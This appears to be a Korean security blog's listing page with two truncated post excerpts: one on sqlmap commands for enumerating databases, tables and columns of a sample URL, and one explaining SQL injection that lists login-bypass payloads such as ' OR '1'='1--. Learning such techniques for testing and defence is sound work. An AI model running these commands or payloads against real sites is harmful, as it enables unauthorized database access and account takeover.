건우Sec

SQLMAP 이란?sql injection 취약점을 사용하여 여러가지 SQL 문법들과 여러가지 조합들을 활용하고DB 서버 침투까지 지원하는 툴(TOOL) 이다.SQLMAP 사용법.sqlmap -u "http://example.com/page.php?id=1"-u 요청할 urlsqlmap -u "http://example.com/page.php?id=1" --dbs--dbs 데이터베이스 가져오기sqlmap -u "http://example.com/page.php?id=1" --tables -D database_name데이터 베이스 정보추출. sqlmap -u "http://example.com/page.php?id=1" --columns -D database_name -T table_name테이블 컬륨 확..

SQL INJECTION 이란? SQL 언어 injection 주입하다 SQL 인젝션은 데이터베이스에 취약한 부분을 노려 회원에 아이디 패스워드를알아내거나 관리자 계정을 우회할수 있는 걸 SQL INJECTION 이라고 한다. 이렇게 데이터베이스가 멍청하면 생기는 일이다. 직접 해커가 데이터베이스한테 명령을 내려ID 는 admin 인데 비닐번호는 password 야 어디있는지 알아? 정상인 데이터베이스는 입구컷하지만 멍청한 데이터베이스는 그대로 admin 사용자를 찾아 그대로 내준다 SQL INEJCTION 기법들1. 구문우회 기법 1. ' OR '1'='1--2. ' OR '1'='1' -- 3. ' OR '1'='1'/* 4. ' OR 1=1-- 5. ' OR 1=1# 6. ' OR 1=1-- 7. ..